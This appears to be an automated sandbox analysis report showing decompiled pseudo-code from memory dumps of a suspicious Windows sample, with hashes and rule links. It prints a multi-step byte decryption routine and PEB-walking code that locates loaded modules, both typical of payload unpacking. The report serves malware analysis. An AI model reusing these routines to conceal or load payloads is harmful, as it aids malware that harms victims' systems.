						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42ceb8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42ceb8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00406b36
0x00406b3e
0x00406b42
0x00406b44
0x00406b47
0x00406b49
0x00406b49
0x00406b4b
0x00406b52
0x00406b54
0x00406b54
0x00406b5a
0x00406b6f
0x00406b77
0x00406b79
0x00406b7b
0x00406b7e
0x00406b7f
0x00406b7f
0x00406b85
0x00000000
0x00000000
0x00406b87
0x00406b8a
0x00000000
0x00000000
0x00000000
0x00406b8a
0x00406b8e
0x00406b91
0x00406b93
0x00406b93
0x00406b96
0x00406b9c
0x00406b9d
0x00000000
0x00000000
0x00000000
0x00406b9d
0x00406ba2
0x00406ba5
0x00406ba7
0x00406ba7
0x00406bad
0x00406baf
0x00406bc0
0x00406bb3
0x00406bb7
0x00406e5c
0x00000000
0x00406e5c
0x00406bbd
0x00406bbe
0x00406bbe
0x00406bc6
0x00406bc9
0x00406bcd
0x00406bcf
0x00406bd1
0x00406bd4
0x00000000
0x00000000
0x00406bdc
0x00406be2
0x00406be4
0x00406be6
0x00406be7
0x00406bfc
0x00406bfc
0x00406bff
0x00406c01
0x00406c01
0x00406c03
0x00406c08
0x00406c0a
0x00406c11
0x00406c13
0x00406c1b
0x00406c1b
0x00406c1d
0x00406c1e
0x00406c2d
0x00406c31
0x00406c35
0x00406c38
0x00406c3b
0x00406c40
0x00406c43
0x00406c49
0x00406c50
0x00406c56
0x00406e4f
0x00406e4f
0x00406e54
0x00406e63
0x00000000
0x00000000
0x00000000
0x00406e54
0x00406c63
0x00406c66
0x00406c69
0x00406c6c
0x00406c70
0x00000000
0x00000000
0x00406c7b
0x00406c7e
0x00406c7f
0x00406c81
0x00406c87
0x00406c8a
0x00000000
0x00000000
0x00406c90
0x00406c91
0x00406c94
0x00406c97
0x00406c9a
0x00406ca0
0x00406ca2
0x00406ca2
0x00406caa
0x00406cae
0x00406cb3
0x00406cd8
0x00406cde
0x00406ce0
0x00406ce2
0x00406ce5
0x00406cee
0x00000000
0x00000000
0x00406cb5
0x00406cb5
0x00406cbe
0x00406cc2
0x00000000
0x00000000
0x00406cd3
0x00406cd3
0x00406cd6
0x00000000
0x00000000
0x00406cc6
0x00406cc9
0x00406ccb
0x00406ccf
0x00000000
0x00000000
0x00406cd1
0x00406cd1
0x00000000
0x00406cd3
0x00406cf7
0x00406cfd
0x00406d07
0x00406d09
0x00406d0e
0x00406d10
0x00406d46
0x00406d12
0x00406d12
0x00406d15
0x00406d18
0x00406d22
0x00406d25
0x00406d2c
0x00406d37
0x00406d3e
0x00406d3e
0x00406d48
0x00406d4b
0x00406d4d
0x00406d53
0x00406d53
0x00406d5c
0x00406d5f
0x00406d64
0x00406d73
0x00406d7b
0x00406d80
0x00406da4
0x00406dac
0x00406db0
0x00406db6
0x00406d82
0x00406d90
0x00406d93
0x00406d99
0x00406d99
0x00406dba
0x00406d75
0x00406d75
0x00406d75
0x00406dcb
0x00406dcf
0x00406ddb
0x00406dd6
0x00406dd9
0x00406dd9
0x00406de3
0x00406de8
0x00406df0
0x00406dec
0x00406dee
0x00406dee
0x00406df6
0x00406df8
0x00406dff
0x00406e09
0x00406e13
0x00406e2f
0x00406e33
0x00406c78
0x00406c7e
0x00406c7f
0x00406c81
0x00406c87
0x00406c8a
0x00000000
0x00000000
0x00000000
0x00406c8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e15
0x00406e15
0x00406e15
0x00406e1a
0x00406e23
0x00406e2c
0x00000000
0x00406e2c
0x00406e39
0x00406e39
0x00406e3c
0x00406e43
0x00406e46
0x00000000
0x00406c69
0x00406be9
0x00406beb
0x00406beb
0x00406bef
0x00406bf2
0x00406bf3
0x00406bf3
0x00000000
0x00406beb
0x00406b5f
0x00406b65
0x00000000

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94

Uniqueness

Uniqueness Score: -1.00%

Function 7333AA08, Relevance: .2, Instructions: 206
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E7333AA08(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				signed int _v12;

				_v12 = _v12 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				while(_v12 < _a8) {
					_v5 =  *((intOrPtr*)(_a4 + _v12));
					_v5 = (_v5 & 0x000000ff) + 0x79;
					_v5 = _v5 & 0x000000ff ^ 0x000000e3;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
					_v5 = (_v5 & 0x000000ff) + 0x35;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 0x22;
					_v5 = _v5 & 0x000000ff ^ 0x000000ef;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ 0x0000001e;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ 0x00000026;
					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
					_v5 = _v5 & 0x000000ff ^ 0x000000ba;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x000000ce;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ 0x00000064;
					_v5 = (_v5 & 0x000000ff) - 0xfc;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x000000dd;
					_v5 = (_v5 & 0x000000ff) - 0x66;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x000000f1;
					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
					_v5 = (_v5 & 0x000000ff) - 0x93;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
					_v5 = (_v5 & 0x000000ff) - 0xc;
					_v5 = _v5 & 0x000000ff ^ 0x000000dc;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					 *((char*)(_a4 + _v12)) = _v5;
					_v12 = _v12 + 1;
				}
				return _a4;
			}

0x7333aa0d
0x7333aa11
0x7333aa1e
0x7333aa32
0x7333aa3c
0x7333aa48
0x7333aa51
0x7333aa64
0x7333aa6e
0x7333aa78
0x7333aa82
0x7333aa8e
0x7333aa98
0x7333aaa2
0x7333aaac
0x7333aab6
0x7333aac9
0x7333aad5
0x7333aade
0x7333aaea
0x7333aaf4
0x7333aafe
0x7333ab0a
0x7333ab14
0x7333ab1e
0x7333ab30
0x7333ab39
0x7333ab4c
0x7333ab55
0x7333ab68
0x7333ab72
0x7333ab7c
0x7333ab86
0x7333ab99
0x7333aba2
0x7333abae
0x7333abb8
0x7333abc1
0x7333abca
0x7333abd3
0x7333abdf
0x7333abf2
0x7333abfe
0x7333ac08
0x7333ac1b
0x7333ac25
0x7333ac31
0x7333ac3a
0x7333ac44
0x7333ac4e
0x7333ac57
0x7333ac61
0x7333ac6b
0x7333ac7e
0x7333ac87
0x7333ac91
0x7333ac9d
0x7333aa1b
0x7333aa1b
0x7333acaa

Memory Dump Source

Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5260bc4102c09d1ce56fc17b1cfddd8116927d78867386c2d7d70e46fbde87d
Instruction ID: 83a86082570f3902b62a25ec5c0a231cfa5d4fd989cef0cfeaa48eeb7a68e39f
Opcode Fuzzy Hash: f5260bc4102c09d1ce56fc17b1cfddd8116927d78867386c2d7d70e46fbde87d
Instruction Fuzzy Hash: EDA1261085D2ECADDB06CBF985657FDBFB05E26102F0845CAE4E5E6243C13A938EDB21

Uniqueness

Uniqueness Score: -1.00%

Function 7333AA17, Relevance: .2, Instructions: 198
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E7333AA17() {
				void* _t281;

				L0:
				while(1) {
					L0:
					 *(_t281 - 8) =  *(_t281 - 8) + 1;
					L1:
					if( *(_t281 - 8) <  *((intOrPtr*)(_t281 + 0xc))) {
						L2:
						 *(_t281 - 1) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) +  *(_t281 - 8)));
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) + 0x79;
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x000000e3;
						 *(_t281 - 1) =  ~( *(_t281 - 1) & 0x000000ff);
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t281 - 1) & 0x000000ff) << 0x00000003;
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) + 0x35;
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^  *(_t281 - 8);
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) + 0x22;
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x000000ef;
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) -  *(_t281 - 8);
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x0000001e;
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) -  *(_t281 - 8);
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x00000026;
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t281 - 1) & 0x000000ff) << 0x00000002;
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x000000ba;
						 *(_t281 - 1) =  !( *(_t281 - 1) & 0x000000ff);
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x000000ce;
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) +  *(_t281 - 8);
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x00000064;
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) - 0xfc;
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^  *(_t281 - 8);
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) -  *(_t281 - 8);
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t281 - 1) & 0x000000ff) << 0x00000007;
						 *(_t281 - 1) =  !( *(_t281 - 1) & 0x000000ff);
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t281 - 1) & 0x000000ff) << 0x00000005;
						 *(_t281 - 1) =  ~( *(_t281 - 1) & 0x000000ff);
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t281 - 1) & 0x000000ff) << 0x00000005;
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) +  *(_t281 - 8);
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^  *(_t281 - 8);
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) +  *(_t281 - 8);
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t281 - 1) & 0x000000ff) << 0x00000002;
						 *(_t281 - 1) =  ~( *(_t281 - 1) & 0x000000ff);
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x000000dd;
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) - 0x66;
						 *(_t281 - 1) =  !( *(_t281 - 1) & 0x000000ff);
						 *(_t281 - 1) =  ~( *(_t281 - 1) & 0x000000ff);
						 *(_t281 - 1) =  !( *(_t281 - 1) & 0x000000ff);
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x000000f1;
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t281 - 1) & 0x000000ff) << 0x00000006;
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) - 0x93;
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^  *(_t281 - 8);
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t281 - 1) & 0x000000ff) << 0x00000006;
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) - 0xc;
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^ 0x000000dc;
						 *(_t281 - 1) =  ~( *(_t281 - 1) & 0x000000ff);
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^  *(_t281 - 8);
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) +  *(_t281 - 8);
						 *(_t281 - 1) =  ~( *(_t281 - 1) & 0x000000ff);
						 *(_t281 - 1) =  *(_t281 - 1) & 0x000000ff ^  *(_t281 - 8);
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) -  *(_t281 - 8);
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t281 - 1) & 0x000000ff) << 0x00000006;
						 *(_t281 - 1) =  !( *(_t281 - 1) & 0x000000ff);
						 *(_t281 - 1) = ( *(_t281 - 1) & 0x000000ff) -  *(_t281 - 8);
						 *((char*)( *((intOrPtr*)(_t281 + 8)) +  *(_t281 - 8))) =  *(_t281 - 1);
						continue;
					}
					L3:
					return  *((intOrPtr*)(_t281 + 8));
					L4:
				}
			}

0x7333aa17
0x7333aa17
0x7333aa17
0x7333aa1b
0x7333aa1e
0x7333aa24
0x7333aa2a
0x7333aa32
0x7333aa3c
0x7333aa48
0x7333aa51
0x7333aa64
0x7333aa6e
0x7333aa78
0x7333aa82
0x7333aa8e
0x7333aa98
0x7333aaa2
0x7333aaac
0x7333aab6
0x7333aac9
0x7333aad5
0x7333aade
0x7333aaea
0x7333aaf4
0x7333aafe
0x7333ab0a
0x7333ab14
0x7333ab1e
0x7333ab30
0x7333ab39
0x7333ab4c
0x7333ab55
0x7333ab68
0x7333ab72
0x7333ab7c
0x7333ab86
0x7333ab99
0x7333aba2
0x7333abae
0x7333abb8
0x7333abc1
0x7333abca
0x7333abd3
0x7333abdf
0x7333abf2
0x7333abfe
0x7333ac08
0x7333ac1b
0x7333ac25
0x7333ac31
0x7333ac3a
0x7333ac44
0x7333ac4e
0x7333ac57
0x7333ac61
0x7333ac6b
0x7333ac7e
0x7333ac87
0x7333ac91
0x7333ac9d
0x00000000
0x7333ac9d
0x7333aca4
0x7333acaa
0x00000000
0x7333acaa

Memory Dump Source

Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c45ddd23667c15523d2ebaeb5fd2ffe6bdb0f452dc564a770a20f136c23d8d5
Instruction ID: f2ba37adf45ecd9088c2ddbb6014f1cedd3f1dc6c6c4b45f321ac0ae9c875e53
Opcode Fuzzy Hash: 2c45ddd23667c15523d2ebaeb5fd2ffe6bdb0f452dc564a770a20f136c23d8d5
Instruction Fuzzy Hash: CB91041485D2EDADDB06CBF945643FCBFB05E2A102F4845DAE0E5E6243C13A938EDB21

Uniqueness

Uniqueness Score: -1.00%

Function 7333A616, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
Instruction ID: 3c67f0f5c4902f9d6349774fb040d202c4fd5456a682f77aae3c60ea6033e769
Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
Instruction Fuzzy Hash: 52114C71A10105EFCB20DFA9C8889ADF7FDEF466917948069F816D3354E334DE40C660

Uniqueness

Uniqueness Score: -1.00%

Function 7333A706, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
Instruction ID: 62fa38ca7f5483799d34db5c9ec581c8ffcdf7bf39a18725dd46f250c8c3c90c
Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
Instruction Fuzzy Hash: DAE012357646459FC754CBA8C981E55B3F8EB19220B558294F825C73E0EA34ED00D650

Uniqueness

Uniqueness Score: -1.00%

Function 7333A744, Relevance: .0, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E7333A744(void* __ecx, void* __eflags) {
				void* _t10;
				intOrPtr* _t14;
				intOrPtr* _t15;

				_t10 = __ecx;
				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
				_t15 = _t14;
				while(E7333A616( *((intOrPtr*)(_t15 + 0x30)), _t10) != 0) {
					_t15 =  *_t15;
					if(_t15 != _t14) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_t15 + 0x28));
			}

0x7333a750
0x7333a752
0x7333a755
0x7333a757
0x7333a765
0x7333a769
0x00000000
0x00000000
0x00000000
0x7333a76b
0x00000000

Memory Dump Source

Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction ID: 7c08c6885d1e72869b026998bfe33e5f100e5a0179215f1eca88ea8ac96ac156
Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction Fuzzy Hash: B0E0863A7106108BC331DB59C9C0A52F3F9FB8A2B17598869F8AAD3710C230FC018650

Uniqueness

Uniqueness Score: -1.00%

Function 7333A6C7, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E7333A6C7() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}

0x7333a6da

Memory Dump Source

Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00403FCB, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42a080 =  *0x42a080 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EEA(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42dbc0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
